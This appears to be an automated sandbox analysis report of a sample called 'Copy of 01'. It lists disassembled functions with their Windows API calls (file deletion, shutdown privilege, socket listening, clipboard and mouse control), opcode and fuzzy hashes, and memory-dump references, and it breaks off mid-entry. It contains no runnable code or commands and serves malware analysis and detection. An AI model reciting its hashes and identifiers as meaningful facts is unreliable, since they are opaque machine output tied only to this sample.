                        • Opcode ID: 1b904fd3367184ed3df09d9b16ebeaa27d77da3b71674caaeb9b99636db6ba51
                        • Instruction ID: cccf64afb31ad269354f530ffca349d700e7cf254e0a6db0ad1df614fd45c08a
                        • Opcode Fuzzy Hash: 1b904fd3367184ed3df09d9b16ebeaa27d77da3b71674caaeb9b99636db6ba51
                        • Instruction Fuzzy Hash: 0E31B0325002196ADF12EFA4EC49FEE77ACDF07320F118556E914F21A0DB39EE458B20
                        Function 003A8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 003A8257
                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 003A8267
                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003A8273
                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A8310
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8324
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8356
                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003A838C
                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8395
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CurrentDirectoryTime$File$Local$System
                        • String ID: *.*
                        • API String ID: 1464919966-438819550
                        • Opcode ID: cdb30c16dcb16c6f1c65dd6f974b67c548fb5a66077f92434091043b3aecda30
                        • Instruction ID: 7a1f713e16fdd48fdac93cb5a6bcedcfec8d0a3e69484e1e922ee2bec63d56a8
                        • Opcode Fuzzy Hash: cdb30c16dcb16c6f1c65dd6f974b67c548fb5a66077f92434091043b3aecda30
                        • Instruction Fuzzy Hash: 10615A765043459FDB11EF60C880AAEB3E8FF8A310F048D1AF989DB251DB35E945CB92
                        Function 0039D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                        • FindFirstFileW.KERNEL32(?,?), ref: 0039D122
                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0039D1DD
                        • MoveFileW.KERNEL32(?,?), ref: 0039D1F0
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0039D20D
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0039D237
                          • Part of subcall function 0039D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0039D21C,?,?), ref: 0039D2B2
                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0039D253
                        • FindClose.KERNEL32(00000000), ref: 0039D264
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                        • String ID: \*.*
                        • API String ID: 1946585618-1173974218
                        • Opcode ID: a72b7b313e5d03cdeb49c638c351b6c1ede21ee7fa5f433b4a56d87b91f07473
                        • Instruction ID: fb75530b5c2a28def164653b4b8f5fdc007a45c2f66707c4c21e9511a569e8f8
                        • Opcode Fuzzy Hash: a72b7b313e5d03cdeb49c638c351b6c1ede21ee7fa5f433b4a56d87b91f07473
                        • Instruction Fuzzy Hash: 4D615F3180510D9FCF07EBE0DA929EDB779AF55300F248565E4467B191EB31AF09CB60
                        Function 003AED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: c043fda8aeab1f91e8ef3323119c1ccb09acc07bc037599c5d988d7134054a3f
                        • Instruction ID: 2f911999940646a056ec68223d75a779070f3f79345b436ed397cd3acd153cf4
                        • Opcode Fuzzy Hash: c043fda8aeab1f91e8ef3323119c1ccb09acc07bc037599c5d988d7134054a3f
                        • Instruction Fuzzy Hash: 2341AB35204611AFE722CF15D888F19BBE9EF45329F19D099E8199FA62C735FC42CB90
                        Function 0039E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 003916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                          • Part of subcall function 003916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                          • Part of subcall function 003916C3: GetLastError.KERNEL32 ref: 0039174A
                        • ExitWindowsEx.USER32(?,00000000), ref: 0039E932
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $ $@$SeShutdownPrivilege
                        • API String ID: 2234035333-3163812486
                        • Opcode ID: a449b0de9da0fd621dc3e6f9bd7bdbc382fd4834fa73a4ac8b628799e15eeb6f
                        • Instruction ID: c2e17d0c84c03e6f0a958fae112cc67095678395240af6d6fb6edc9edea87847
                        • Opcode Fuzzy Hash: a449b0de9da0fd621dc3e6f9bd7bdbc382fd4834fa73a4ac8b628799e15eeb6f
                        • Instruction Fuzzy Hash: D601F973A20215AFEF56B6B49C86FBF726CA714751F150821FD13F61D1DBA96C408290
                        Function 003B1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003B1276
                        • WSAGetLastError.WSOCK32 ref: 003B1283
                        • bind.WSOCK32(00000000,?,00000010), ref: 003B12BA
                        • WSAGetLastError.WSOCK32 ref: 003B12C5
                        • closesocket.WSOCK32(00000000), ref: 003B12F4
                        • listen.WSOCK32(00000000,00000005), ref: 003B1303
                        • WSAGetLastError.WSOCK32 ref: 003B130D
                        • closesocket.WSOCK32(00000000), ref: 003B133C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$closesocket$bindlistensocket
                        • String ID:
                        • API String ID: 540024437-0
                        • Opcode ID: 75768b99e8851c2092ea8121c1505d3f265da7cc80f175cc8a3594443e3c7fd2
                        • Instruction ID: 66726eae312b8e71625800625603e258c26f4c849bff496a15be40cf504bd067
                        • Opcode Fuzzy Hash: 75768b99e8851c2092ea8121c1505d3f265da7cc80f175cc8a3594443e3c7fd2
                        • Instruction Fuzzy Hash: 0941D435A002009FD711DF24C494B6ABBE5BF46318F598488D95A8F6D2C731FD81CBE0
                        Function 0036B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 0036B9D4
                        • _free.LIBCMT ref: 0036B9F8
                        • _free.LIBCMT ref: 0036BB7F
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,003D3700), ref: 0036BB91
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0036BC09
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00401270,000000FF,?,0000003F,00000000,?), ref: 0036BC36
                        • _free.LIBCMT ref: 0036BD4B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                        • String ID:
                        • API String ID: 314583886-0
                        • Opcode ID: 4b771f6423f7b0695a9a16ecbbd00232eef023a7adceb66fe2cc4795d3992010
                        • Instruction ID: 93602a0bea8ee5e86e0f824aa792dc619ab007b02ca1772f9a0e9c002e708588
                        • Opcode Fuzzy Hash: 4b771f6423f7b0695a9a16ecbbd00232eef023a7adceb66fe2cc4795d3992010
                        • Instruction Fuzzy Hash: C1C11975A042049FCB279F78CC41AAAFBB9EF41350F15C1AAE495EB259D7309E81CF50
                        Function 0039D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                        • FindFirstFileW.KERNEL32(?,?), ref: 0039D420
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0039D470
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0039D481
                        • FindClose.KERNEL32(00000000), ref: 0039D498
                        • FindClose.KERNEL32(00000000), ref: 0039D4A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                        • String ID: \*.*
                        • API String ID: 2649000838-1173974218
                        • Opcode ID: 65ba0c05958b0722b693fef3193c5e8659e3fd360cf5c40391449e565d2303fc
                        • Instruction ID: 47fe3c2c6fe5f99d8a10ac63505c0d2bd1de4f84176df40e26c57f1fd1c1ce0d
                        • Opcode Fuzzy Hash: 65ba0c05958b0722b693fef3193c5e8659e3fd360cf5c40391449e565d2303fc
                        • Instruction Fuzzy Hash: D8315C710183459BC706EF64D8929AFB7A8AE91314F448E1DF4D5971A1EF20AA09CB63
                        Function 0036E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 5c642285a41b7a578ff69738dc4362716adc86a4957abab0706dd8e7e1979771
                        • Instruction ID: f2b65f6e36d824acd251a2a20ae2c2d3b77a74e2328c6943c19d0429e7595902
                        • Opcode Fuzzy Hash: 5c642285a41b7a578ff69738dc4362716adc86a4957abab0706dd8e7e1979771
                        • Instruction Fuzzy Hash: E9C26E75E086288FDB26CF28DD407EAB7B9EB45305F1581EAD80DE7244E774AE858F40
                        Function 003A648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 003A64DC
                        • CoInitialize.OLE32(00000000), ref: 003A6639
                        • CoCreateInstance.OLE32(003CFCF8,00000000,00000001,003CFB68,?), ref: 003A6650
                        • CoUninitialize.OLE32 ref: 003A68D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                        • String ID: .lnk
                        • API String ID: 886957087-24824748
                        • Opcode ID: 8be1e6542d808900d24988852ac8a9bf06c30b081e9bd7d7b8dfb0d46cf68d04
                        • Instruction ID: b49147b49d17ee3740a5433d712a262a59f0d61253e5a4e18755aaab5e295825
                        • Opcode Fuzzy Hash: 8be1e6542d808900d24988852ac8a9bf06c30b081e9bd7d7b8dfb0d46cf68d04
                        • Instruction Fuzzy Hash: 2CD13971508201AFD315EF24C882E6BB7E9FF95704F04496DF5958B2A1EB70ED05CB92
                        Function 003B22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32(?,?,00000000), ref: 003B22E8
                          • Part of subcall function 003AE4EC: GetWindowRect.USER32(?,?), ref: 003AE504
                        • GetDesktopWindow.USER32 ref: 003B2312
                        • GetWindowRect.USER32(00000000), ref: 003B2319
                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 003B2355
                        • GetCursorPos.USER32(?), ref: 003B2381
                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003B23DF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                        • String ID:
                        • API String ID: 2387181109-0
                        • Opcode ID: ebe05202b236739dd6d5565cdfe13699984ef63c7a80b0461657fb63135ba935
                        • Instruction ID: 624582774cf13172e0cd514bc8b7ffadd59e6790915dbb90eed1a0d585b9e2d0
                        • Opcode Fuzzy Hash: ebe05202b236739dd6d5565cdfe13699984ef63c7a80b0461657fb63135ba935
                        • Instruction Fuzzy Hash: 7431BE72504315ABDB22DF55C849E9BB7E9FB88314F000A19F989D7191DB34E909CB92
                        Function 003A9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 003A9B78
                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 003A9C8B
                          • Part of subcall function 003A3874: GetInputState.USER32 ref: 003A38CB
                          • Part of subcall function 003A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003A3966
                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 003A9BA8
                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 003A9C75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                        • String ID: *.*
                        • API String ID: 1972594611-438819550
                        • Opcode ID: 7c9a7fe37d6ad92bde28a4457294e4923a78b10abce00db776cb76fbc61ba643
                        • Instruction ID: e59ffa90888ece704b0d1197acc1cf245ffa9a5c0ea0056709b0b4e8e961b92b
                        • Opcode Fuzzy Hash: 7c9a7fe37d6ad92bde28a4457294e4923a78b10abce00db776cb76fbc61ba643
                        • Instruction Fuzzy Hash: 9441307194460A9FCF16DFA4C985BEEBBB8EF06311F248156E905B6191EB309E44CF60
                        Function 0034997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00349A4E
                        • GetSysColor.USER32(0000000F), ref: 00349B23
                        • SetBkColor.GDI32(?,00000000), ref: 00349B36
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Color$LongProcWindow
                        • String ID:
                        • API String ID: 3131106179-0
                        • Opcode ID: 30d893dec7e2f41d89bb7b65b2902b39ab7b960546b9ba9dc0c5d76044e7f70b
                        • Instruction ID: ccc2c9f3ac840612bc20cc63fcfbfd93267e7e63c35db068a32e50363d256a5f
                        • Opcode Fuzzy Hash: 30d893dec7e2f41d89bb7b65b2902b39ab7b960546b9ba9dc0c5d76044e7f70b
                        • Instruction Fuzzy Hash: 17A1FA70108554AEE727BA3C8C89F7B2ADEDB82350F26425BF502DEA91CA25FD01D375
                        Function 003B1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 003B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
                          • Part of subcall function 003B304E: _wcslen.LIBCMT ref: 003B309B
                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003B185D
                        • WSAGetLastError.WSOCK32 ref: 003B1884
                        • bind.WSOCK32(00000000,?,00000010), ref: 003B18DB
                        • WSAGetLastError.WSOCK32 ref: 003B18E6
                        • closesocket.WSOCK32(00000000), ref: 003B1915
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 1601658205-0
                        • Opcode ID: 6f846360ec075c4541c9f1a5530034d9101a4caa6f926ecb50699ad34919a3d6
                        • Instruction ID: 858fdf1ca7918442159595ea6ac2b36a1e2e5549f4d4394aac32936f18047765
                        • Opcode Fuzzy Hash: 6f846360ec075c4541c9f1a5530034d9101a4caa6f926ecb50699ad34919a3d6
                        • Instruction Fuzzy Hash: B551C675A002006FEB12AF24C8D6F6A77E5AB44718F44845CFA059F7D3C771AD418BA1
                        Function 003C1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: 13fd7899a170efc12ac2f50ea4b35fd8a741adf0ab5dd8394d0bd14dd2d27a6a
                        • Instruction ID: 8c6d46de37e3654da65fd0feecbf3f28732e22c8954194536372a3d2db79cbcc
                        • Opcode Fuzzy Hash: 13fd7899a170efc12ac2f50ea4b35fd8a741adf0ab5dd8394d0bd14dd2d27a6a
                        • Instruction Fuzzy Hash: AB2191317402105FD7229F1AC884F6A7BA9EF96315F1AD06CE84ACB352CB71EC42DB90
                        Function 00338060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        • API String ID: 0-1546025612
                        • Opcode ID: 17eac49ce974cf8ad8fa92a7830afccd0b4cc022d234b9d3d630b4d7f949b4c2
                        • Instruction ID: 32c543e1319d82574ac451ef6b42341d37e8f0ea581a6d3d301411560b42454d
                        • Opcode Fuzzy Hash: 17eac49ce974cf8ad8fa92a7830afccd0b4cc022d234b9d3d630b4d7f949b4c2
                        • Instruction Fuzzy Hash: D4A2A174E0061ACBDF36CF58C8917AEB7B1BF44310F2585A9E819AB681DB749D81CF90
                        Function 00398298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003982AA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
